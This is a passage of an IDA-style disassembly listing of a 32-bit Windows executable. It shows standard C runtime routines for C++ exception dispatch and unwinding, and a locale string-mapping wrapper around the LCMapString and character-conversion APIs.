; ---------------------------------------------------------------------------
loc_40B878: ; CODE XREF: sub_40B818+3F�j
lea eax, [esi+8]
push eax
push dword ptr [edi+18h]
call sub_40B416
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push ebx
call sub_404235
loc_40B890: ; CODE XREF: sub_40B818+42�j
; sub_40B818+5E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call __SEH_epilog4
retn
sub_40B818 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_40BE59
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B8A9 proc near ; CODE XREF: sub_40B915+D4�p
; sub_40BA07+25D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
cmp [ebp+arg_10], 0
jz short loc_40B8C2
push [ebp+arg_10]
push ebx
push esi
push [ebp+arg_0]
call sub_40B818
add esp, 10h
loc_40B8C2: ; CODE XREF: sub_40B8A9+7�j
cmp [ebp+arg_18], 0
push [ebp+arg_0]
jnz short loc_40B8CE
push esi
jmp short loc_40B8D1
; ---------------------------------------------------------------------------
loc_40B8CE: ; CODE XREF: sub_40B8A9+20�j
push [ebp+arg_18]
loc_40B8D1: ; CODE XREF: sub_40B8A9+23�j
call sub_40423C
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_40B29C
mov eax, [edi+4]
push 100h
push [ebp+arg_14]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_40B4FD
add esp, 28h
test eax, eax
jz short loc_40B913
push esi
push eax
call sub_404205
loc_40B913: ; CODE XREF: sub_40B8A9+61�j
pop ebp
retn
sub_40B8A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B915 proc near ; CODE XREF: sub_40BA07+336�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_40BA04
push edi
call sub_40539D
cmp dword ptr [eax+80h], 0
jz short loc_40B978
call sub_40539D
lea edi, [eax+80h]
call sub_40518A
cmp [edi], eax
jz short loc_40B978
cmp dword ptr [esi], 0E0434F4Dh
jz short loc_40B978
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_4042F4
add esp, 1Ch
test eax, eax
jnz loc_40BA03
loc_40B978: ; CODE XREF: sub_40B915+22�j
; sub_40B915+36�j ...
mov edi, [ebp+arg_10]
cmp dword ptr [edi+0Ch], 0
jnz short loc_40B986
call sub_40BEA5
loc_40B986: ; CODE XREF: sub_40B915+6A�j
mov esi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push edi
call sub_404466
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_40BA03
push ebx
loc_40B9A9: ; CODE XREF: sub_40B915+EB�j
cmp esi, [edi]
jl short loc_40B9F4
cmp esi, [edi+4]
jg short loc_40B9F4
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_40B9CA
cmp byte ptr [ecx+8], 0
jnz short loc_40B9F4
loc_40B9CA: ; CODE XREF: sub_40B915+AD�j
lea ebx, [eax-10h]
test byte ptr [ebx], 40h
jnz short loc_40B9F4
push [ebp+arg_1C]
mov esi, [ebp+arg_4]
push [ebp+arg_18]
push 0
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_40B8A9
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_40B9F4: ; CODE XREF: sub_40B915+96�j
; sub_40B915+9B�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_40B9A9
pop ebx
loc_40BA03: ; CODE XREF: sub_40B915+5D�j
; sub_40B915+91�j
pop edi
loc_40BA04: ; CODE XREF: sub_40B915+F�j
pop esi
leave
retn
sub_40B915 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA07 proc near ; CODE XREF: sub_40BD75+D4�p
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 2Ch
mov ecx, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_10]
mov eax, [ebx+4]
cmp eax, 80h
push esi
push edi
mov [ebp+var_1], 0
jg short loc_40BA2A
movsx ecx, byte ptr [ecx+8]
jmp short loc_40BA2D
; ---------------------------------------------------------------------------
loc_40BA2A: ; CODE XREF: sub_40BA07+1B�j
mov ecx, [ecx+8]
loc_40BA2D: ; CODE XREF: sub_40BA07+21�j
cmp ecx, 0FFFFFFFFh
mov [ebp+var_8], ecx
jl short loc_40BA39
cmp ecx, eax
jl short loc_40BA3E
loc_40BA39: ; CODE XREF: sub_40BA07+2C�j
call sub_40BEA5
loc_40BA3E: ; CODE XREF: sub_40BA07+30�j
mov esi, [ebp+arg_0]
mov edi, 0E06D7363h
cmp [esi], edi
jnz loc_40BD19
cmp dword ptr [esi+10h], 3
mov ebx, 19930520h
jnz loc_40BB86
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BA76
cmp eax, 19930521h
jz short loc_40BA76
cmp eax, 19930522h
jnz loc_40BB86
loc_40BA76: ; CODE XREF: sub_40BA07+5B�j
; sub_40BA07+62�j
cmp dword ptr [esi+1Ch], 0
jnz loc_40BB86
call sub_40539D
cmp dword ptr [eax+88h], 0
jz loc_40BD58
call sub_40539D
mov esi, [eax+88h]
mov [ebp+arg_0], esi
call sub_40539D
mov eax, [eax+8Ch]
push 1
push esi
mov [ebp+arg_8], eax
call sub_4101B0
test eax, eax
pop ecx
pop ecx
jnz short loc_40BAC1
call sub_40BEA5
loc_40BAC1: ; CODE XREF: sub_40BA07+B3�j
cmp [esi], edi
jnz short loc_40BAEB
cmp dword ptr [esi+10h], 3
jnz short loc_40BAEB
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BAE0
cmp eax, 19930521h
jz short loc_40BAE0
cmp eax, 19930522h
jnz short loc_40BAEB
loc_40BAE0: ; CODE XREF: sub_40BA07+C9�j
; sub_40BA07+D0�j
cmp dword ptr [esi+1Ch], 0
jnz short loc_40BAEB
call sub_40BEA5
loc_40BAEB: ; CODE XREF: sub_40BA07+BC�j
; sub_40BA07+C2�j ...
call sub_40539D
cmp dword ptr [eax+94h], 0
jz loc_40BB86
call sub_40539D
mov edi, [eax+94h]
call sub_40539D
push [ebp+arg_0]
xor esi, esi
mov [eax+94h], esi
call sub_40B43B
test al, al
pop ecx
jnz short loc_40BB7E
xor ebx, ebx
cmp [edi], ebx
jle short loc_40BB45
loc_40BB28: ; CODE XREF: sub_40BA07+13C�j
mov eax, [edi+4]
mov ecx, [ebx+eax+4]
push offset off_423E50
call sub_403017
test al, al
jnz short loc_40BB4A
inc esi
add ebx, 10h
cmp esi, [edi]
jl short loc_40BB28
loc_40BB45: ; CODE XREF: sub_40BA07+11F�j
; sub_40BA07+31C�j
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40BB4A: ; CODE XREF: sub_40BA07+134�j
push 1
push [ebp+arg_0]
call sub_40B3C2
pop ecx
pop ecx
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_2C]
mov [ebp+arg_0], offset aBadException ; "bad exception"
call sub_402C0C
push offset dword_4216E4
lea eax, [ebp+var_2C]
push eax
mov [ebp+var_2C], offset off_41DC24
call sub_4041BB
loc_40BB7E: ; CODE XREF: sub_40BA07+119�j
mov esi, [ebp+arg_0]
mov edi, 0E06D7363h
loc_40BB86: ; CODE XREF: sub_40BA07+50�j
; sub_40BA07+69�j ...
cmp [esi], edi
jnz loc_40BD16
cmp dword ptr [esi+10h], 3
jnz loc_40BD16
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BBB1
cmp eax, 19930521h
jz short loc_40BBB1
cmp eax, 19930522h
jnz loc_40BD16
loc_40BBB1: ; CODE XREF: sub_40BA07+196�j
; sub_40BA07+19D�j
mov edi, [ebp+arg_10]
cmp dword ptr [edi+0Ch], 0
jbe loc_40BC7D
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_8]
push [ebp+arg_18]
push edi
call sub_404466
add esp, 14h
mov edi, eax
loc_40BBD7: ; CODE XREF: sub_40BA07+26E�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_1C]
jnb loc_40BC7A
mov eax, [ebp+var_8]
cmp [edi], eax
jg loc_40BC6F
cmp eax, [edi+4]
jg short loc_40BC6F
mov eax, [edi+10h]
mov [ebp+var_C], eax
mov eax, [edi+0Ch]
test eax, eax
mov [ebp+var_18], eax
jle short loc_40BC6F
loc_40BC03: ; CODE XREF: sub_40BA07+23C�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea ebx, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_14], eax
jle short loc_40BC38
loc_40BC15: ; CODE XREF: sub_40BA07+22F�j
push dword ptr [esi+1Ch]
mov eax, [ebx]
push eax
push [ebp+var_C]
mov [ebp+var_20], eax
call sub_40B1FC
add esp, 0Ch
test eax, eax
jnz short loc_40BC47
dec [ebp+var_14]
add ebx, 4
cmp [ebp+var_14], eax
jg short loc_40BC15
loc_40BC38: ; CODE XREF: sub_40BA07+20C�j
dec [ebp+var_18]
add [ebp+var_C], 10h
cmp [ebp+var_18], 0
jg short loc_40BC03
jmp short loc_40BC6F
; ---------------------------------------------------------------------------
loc_40BC47: ; CODE XREF: sub_40BA07+224�j
push [ebp+arg_1C]
mov ebx, [ebp+var_C]
push [ebp+arg_18]
mov [ebp+var_1], 1
push [ebp+var_20]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
mov esi, [ebp+arg_4]
call sub_40B8A9
mov esi, [ebp+arg_0]
add esp, 1Ch
loc_40BC6F: ; CODE XREF: sub_40BA07+1E1�j
; sub_40BA07+1EA�j ...
inc [ebp+var_10]
add edi, 14h
jmp loc_40BBD7
; ---------------------------------------------------------------------------
loc_40BC7A: ; CODE XREF: sub_40BA07+1D6�j
mov edi, [ebp+arg_10]
loc_40BC7D: ; CODE XREF: sub_40BA07+1B1�j
cmp [ebp+arg_14], 0
jz short loc_40BC8D
push 1
push esi
call sub_40B3C2
pop ecx
pop ecx
loc_40BC8D: ; CODE XREF: sub_40BA07+27A�j
cmp [ebp+var_1], 0
jnz loc_40BD45
mov eax, [edi]
and eax, 1FFFFFFFh
cmp eax, 19930521h
jb loc_40BD45
mov edi, [edi+1Ch]
test edi, edi
jz loc_40BD45
push esi
call sub_40B43B
test al, al
pop ecx
jnz loc_40BD45
call sub_40539D
call sub_40539D
call sub_40539D
mov [eax+88h], esi
call sub_40539D
cmp [ebp+arg_1C], 0
mov ecx, [ebp+arg_8]
mov [eax+8Ch], ecx
push esi
jnz short loc_40BCF2
push [ebp+arg_4]
jmp short loc_40BCF5
; ---------------------------------------------------------------------------
loc_40BCF2: ; CODE XREF: sub_40BA07+2E4�j
push [ebp+arg_1C]
loc_40BCF5: ; CODE XREF: sub_40BA07+2E9�j
call sub_40423C
mov esi, [ebp+arg_10]
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_40B29C
add esp, 10h
push dword ptr [esi+1Ch]
call sub_40B4B4
loc_40BD16: ; CODE XREF: sub_40BA07+181�j
; sub_40BA07+18B�j ...
mov ebx, [ebp+arg_10]
loc_40BD19: ; CODE XREF: sub_40BA07+41�j
cmp dword ptr [ebx+0Ch], 0
jbe short loc_40BD45
cmp [ebp+arg_14], 0
jnz loc_40BB45
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_8]
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_40B915
add esp, 20h
loc_40BD45: ; CODE XREF: sub_40BA07+28A�j
; sub_40BA07+29C�j ...
call sub_40539D
cmp dword ptr [eax+94h], 0
jz short loc_40BD58
call sub_40BEA5
loc_40BD58: ; CODE XREF: sub_40BA07+85�j
; sub_40BA07+34A�j
pop edi
pop esi
pop ebx
leave
retn
sub_40BA07 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_402C72
mov dword ptr [esi], offset off_41DC24
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BD75 proc near ; CODE XREF: sub_40428E+21�p
; .text:004042EA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_40539D
cmp dword ptr [eax+20Ch], 0
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_0]
mov edi, 0E06D7363h
mov esi, 1FFFFFFFh
mov ebx, 19930522h
jnz short loc_40BDBE
mov edx, [ecx]
cmp edx, edi
jz short loc_40BDBE
cmp edx, 80000026h
jz short loc_40BDBE
mov edx, [eax]
and edx, esi
cmp edx, ebx
jb short loc_40BDBE
test byte ptr [eax+20h], 1
jnz loc_40BE51
loc_40BDBE: ; CODE XREF: sub_40BD75+27�j
; sub_40BD75+2D�j ...
test byte ptr [ecx+4], 66h
jz short loc_40BDE7
cmp dword ptr [eax+4], 0
jz loc_40BE51
cmp [ebp+arg_14], 0
jnz short loc_40BE51
push 0FFFFFFFFh
push eax
push [ebp+arg_C]
push [ebp+arg_4]
call sub_40B29C
add esp, 10h
jmp short loc_40BE51
; ---------------------------------------------------------------------------
loc_40BDE7: ; CODE XREF: sub_40BD75+4D�j
cmp dword ptr [eax+0Ch], 0
jnz short loc_40BDFF
mov edx, [eax]
and edx, esi
cmp edx, 19930521h
jb short loc_40BE51
cmp dword ptr [eax+1Ch], 0
jz short loc_40BE51
loc_40BDFF: ; CODE XREF: sub_40BD75+76�j
cmp [ecx], edi
jnz short loc_40BE35
cmp dword ptr [ecx+10h], 3
jb short loc_40BE35
cmp [ecx+14h], ebx
jbe short loc_40BE35
mov edx, [ecx+1Ch]
mov edx, [edx+8]
test edx, edx
jz short loc_40BE35
movzx esi, byte ptr [ebp+arg_1C]
push esi
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ecx
call edx
add esp, 20h
jmp short loc_40BE54
; ---------------------------------------------------------------------------
loc_40BE35: ; CODE XREF: sub_40BD75+8C�j
; sub_40BD75+92�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ecx
call sub_40BA07
add esp, 20h
loc_40BE51: ; CODE XREF: sub_40BD75+43�j
; sub_40BD75+53�j ...
xor eax, eax
inc eax
loc_40BE54: ; CODE XREF: sub_40BD75+BE�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40BD75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BE59 proc near ; CODE XREF: sub_40B11E:loc_40B152�p
; sub_40B258+22�j ...
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 0040BE80 SIZE 00000012 BYTES
push 8
push offset dword_421720
call __SEH_prolog4
call sub_40539D
mov eax, [eax+78h]
test eax, eax
jz short loc_40BE87
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_40BE80
sub_40BE59 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_40BE59
loc_40BE80: ; CODE XREF: sub_40BE59+1E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40BE87: ; CODE XREF: sub_40BE59+16�j
call sub_4101BD
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40BE59
; =============== S U B R O U T I N E =======================================
sub_40BE92 proc near ; CODE XREF: sub_40B4B4+23�p
call sub_40539D
mov eax, [eax+7Ch]
test eax, eax
jz short loc_40BEA0
call eax
loc_40BEA0: ; CODE XREF: sub_40BE92+A�j
jmp sub_40BE59
sub_40BE92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BEA5 proc near ; CODE XREF: sub_404466+1C�p
; sub_404466:loc_4044C7�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset dword_421740
call __SEH_prolog4
push off_42640C
call sub_405193
pop ecx
test eax, eax
jz short loc_40BED7
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_40BED0
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_40BED0: ; CODE XREF: sub_40BEA5+22�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40BED7: ; CODE XREF: sub_40BEA5+1A�j
jmp sub_40BE59
sub_40BEA5 endp
; =============== S U B R O U T I N E =======================================
sub_40BEDC proc near ; CODE XREF: sub_407B19+33�p
push offset sub_40BE59
call sub_405127
pop ecx
mov off_42640C, eax
retn
sub_40BEDC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BEF0 proc near ; CODE XREF: sub_40456E+4A�p
; sub_40B29C+77�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_40EC54
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_40BF2F
mov ecx, 2
loc_40BF2F: ; CODE XREF: sub_40BEF0+38�j
push ecx
call sub_40EC54
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_40BEF0 endp
; =============== S U B R O U T I N E =======================================
sub_40BF3C proc near ; CODE XREF: sub_40BF57+220�p
; sub_40BF57+229�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jz short locret_40BF56
sub eax, 8
cmp dword ptr [eax], 0DDDDh
jnz short locret_40BF56
push eax
call sub_403603
pop ecx
locret_40BF56: ; CODE XREF: sub_40BF3C+6�j
; sub_40BF3C+11�j
retn
sub_40BF3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BF57 proc near ; CODE XREF: sub_40C2F9+2C�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
cmp dword_426410, ebx
push edi
mov esi, ecx
jnz short loc_40BFAE
push ebx
push ebx
xor edi, edi
inc edi
push edi
push offset dword_41DC3C
push 100h
push ebx
call ds:dword_41D12C ; LCMapStringW
test eax, eax
jz short loc_40BF99
mov dword_426410, edi
jmp short loc_40BFAE
; ---------------------------------------------------------------------------
loc_40BF99: ; CODE XREF: sub_40BF57+38�j
call ds:dword_41D0F0 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_40BFAE
mov dword_426410, 2
loc_40BFAE: ; CODE XREF: sub_40BF57+1D�j
; sub_40BF57+40�j ...
cmp [ebp+arg_C], ebx
jle short loc_40BFD5
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_40BFB9: ; CODE XREF: sub_40BF57+6A�j
dec ecx
cmp [eax], bl
jz short loc_40BFC6
inc eax
cmp ecx, ebx
jnz short loc_40BFB9
or ecx, 0FFFFFFFFh
loc_40BFC6: ; CODE XREF: sub_40BF57+65�j
mov eax, [ebp+arg_C]
sub eax, ecx
dec eax
cmp eax, [ebp+arg_C]
jge short loc_40BFD2
inc eax
loc_40BFD2: ; CODE XREF: sub_40BF57+78�j
mov [ebp+arg_C], eax
loc_40BFD5: ; CODE XREF: sub_40BF57+5A�j
mov eax, dword_426410
cmp eax, 2
jz loc_40C18E
cmp eax, ebx
jz loc_40C18E
cmp eax, 1
jnz loc_40C1BF
cmp [ebp+arg_18], ebx
mov [ebp+var_8], ebx
jnz short loc_40C004
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40C004: ; CODE XREF: sub_40BF57+A3�j
mov esi, ds:dword_41D0A0
xor eax, eax
cmp [ebp+arg_1C], ebx
push ebx
push ebx
push [ebp+arg_C]
setnz al
push [ebp+arg_8]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call esi ; MultiByteToWideChar
mov edi, eax
cmp edi, ebx
jz loc_40C1BF
jle short loc_40C076
push 0FFFFFFE0h
xor edx, edx
pop eax
div edi
cmp eax, 2
jb short loc_40C076
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40C05D
call sub_4104B0
mov eax, esp
cmp eax, ebx
jz short loc_40C071
mov dword ptr [eax], 0CCCCh
jmp short loc_40C06E
; ---------------------------------------------------------------------------
loc_40C05D: ; CODE XREF: sub_40BF57+F1�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C071
mov dword ptr [eax], 0DDDDh
loc_40C06E: ; CODE XREF: sub_40BF57+104�j
add eax, 8
loc_40C071: ; CODE XREF: sub_40BF57+FC�j
; sub_40BF57+10F�j
mov [ebp+var_C], eax
jmp short loc_40C079
; ---------------------------------------------------------------------------
loc_40C076: ; CODE XREF: sub_40BF57+DA�j
; sub_40BF57+E6�j
mov [ebp+var_C], ebx
loc_40C079: ; CODE XREF: sub_40BF57+11D�j
cmp [ebp+var_C], ebx
jz loc_40C1BF
push edi
push [ebp+var_C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call esi ; MultiByteToWideChar
test eax, eax
jz loc_40C17D
mov esi, ds:dword_41D12C
push ebx
push ebx
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; LCMapStringW
mov ecx, eax
cmp ecx, ebx
mov [ebp+var_8], ecx
jz loc_40C17D
test word ptr [ebp+arg_4], 400h
jz short loc_40C0ED
cmp [ebp+arg_14], ebx
jz loc_40C17D
cmp ecx, [ebp+arg_14]
jg loc_40C17D
push [ebp+arg_14]
push [ebp+arg_10]
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; LCMapStringW
jmp loc_40C17D
; ---------------------------------------------------------------------------
loc_40C0ED: ; CODE XREF: sub_40BF57+16B�j
cmp ecx, ebx
jle short loc_40C136
push 0FFFFFFE0h
xor edx, edx
pop eax
div ecx
cmp eax, 2
jb short loc_40C136
lea eax, [ecx+ecx+8]
cmp eax, 400h
ja short loc_40C11E
call sub_4104B0
mov esi, esp
cmp esi, ebx
jz short loc_40C17D
mov dword ptr [esi], 0CCCCh
add esi, 8
jmp short loc_40C138
; ---------------------------------------------------------------------------
loc_40C11E: ; CODE XREF: sub_40BF57+1AF�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C132
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40C132: ; CODE XREF: sub_40BF57+1D0�j
mov esi, eax
jmp short loc_40C138
; ---------------------------------------------------------------------------
loc_40C136: ; CODE XREF: sub_40BF57+198�j
; sub_40BF57+1A4�j
xor esi, esi
loc_40C138: ; CODE XREF: sub_40BF57+1C5�j
; sub_40BF57+1DD�j
cmp esi, ebx
jz short loc_40C17D
push [ebp+var_8]
push esi
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D12C ; LCMapStringW
test eax, eax
jz short loc_40C176
cmp [ebp+arg_14], ebx
push ebx
push ebx
jnz short loc_40C15F
push ebx
push ebx
jmp short loc_40C165
; ---------------------------------------------------------------------------
loc_40C15F: ; CODE XREF: sub_40BF57+202�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_40C165: ; CODE XREF: sub_40BF57+206�j
push [ebp+var_8]
push esi
push ebx
push [ebp+arg_18]
call ds:dword_41D138 ; WideCharToMultiByte
mov [ebp+var_8], eax
loc_40C176: ; CODE XREF: sub_40BF57+1FB�j
push esi
call sub_40BF3C
pop ecx
loc_40C17D: ; CODE XREF: sub_40BF57+13E�j
; sub_40BF57+15F�j ...
push [ebp+var_C]
call sub_40BF3C
mov eax, [ebp+var_8]
pop ecx
jmp loc_40C2E7
; ---------------------------------------------------------------------------
loc_40C18E: ; CODE XREF: sub_40BF57+86�j
; sub_40BF57+8E�j
cmp [ebp+arg_0], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jnz short loc_40C1A1
mov eax, [esi]
mov eax, [eax+14h]
mov [ebp+arg_0], eax
loc_40C1A1: ; CODE XREF: sub_40BF57+240�j
cmp [ebp+arg_18], ebx
jnz short loc_40C1AE
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40C1AE: ; CODE XREF: sub_40BF57+24D�j
push [ebp+arg_0]
call sub_4102B0
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jnz short loc_40C1C6
loc_40C1BF: ; CODE XREF: sub_40BF57+97�j
; sub_40BF57+D4�j ...
xor eax, eax
jmp loc_40C2E7
; ---------------------------------------------------------------------------
loc_40C1C6: ; CODE XREF: sub_40BF57+266�j
cmp eax, [ebp+arg_18]
jz loc_40C2AA
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_4102F7
add esp, 18h
cmp eax, ebx
mov [ebp+var_C], eax
jz short loc_40C1BF
mov esi, ds:dword_41D130
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; LCMapStringA
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40C20D
loc_40C206: ; CODE XREF: sub_40BF57+2D0�j
; sub_40BF57+2F9�j
xor esi, esi
jmp loc_40C2C4
; ---------------------------------------------------------------------------
loc_40C20D: ; CODE XREF: sub_40BF57+2AD�j
jle short loc_40C24C
cmp eax, 0FFFFFFE0h
ja short loc_40C24C
add eax, 8
cmp eax, 400h
ja short loc_40C234
call sub_4104B0
mov edi, esp
cmp edi, ebx
jz short loc_40C206
mov dword ptr [edi], 0CCCCh
add edi, 8
jmp short loc_40C24E
; ---------------------------------------------------------------------------
loc_40C234: ; CODE XREF: sub_40BF57+2C5�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C248
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40C248: ; CODE XREF: sub_40BF57+2E6�j
mov edi, eax
jmp short loc_40C24E
; ---------------------------------------------------------------------------
loc_40C24C: ; CODE XREF: sub_40BF57:loc_40C20D�j
; sub_40BF57+2BB�j
xor edi, edi
loc_40C24E: ; CODE XREF: sub_40BF57+2DB�j
; sub_40BF57+2F3�j
cmp edi, ebx
jz short loc_40C206
push [ebp+var_8]
push ebx
push edi
call sub_407B70
add esp, 0Ch
push [ebp+var_8]
push edi
push [ebp+arg_C]
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; LCMapStringA
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40C27C
xor esi, esi
jmp short loc_40C2A1
; ---------------------------------------------------------------------------
loc_40C27C: ; CODE XREF: sub_40BF57+31F�j
push [ebp+arg_14]
lea eax, [ebp+var_8]
push [ebp+arg_10]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_14]
call sub_4102F7
mov esi, eax
mov [ebp+var_10], esi
add esp, 18h
neg esi
sbb esi, esi
and esi, [ebp+var_8]
loc_40C2A1: ; CODE XREF: sub_40BF57+323�j
push edi
call sub_40BF3C
pop ecx
jmp short loc_40C2C4
; ---------------------------------------------------------------------------
loc_40C2AA: ; CODE XREF: sub_40BF57+272�j
push [ebp+arg_14]
push [ebp+arg_10]
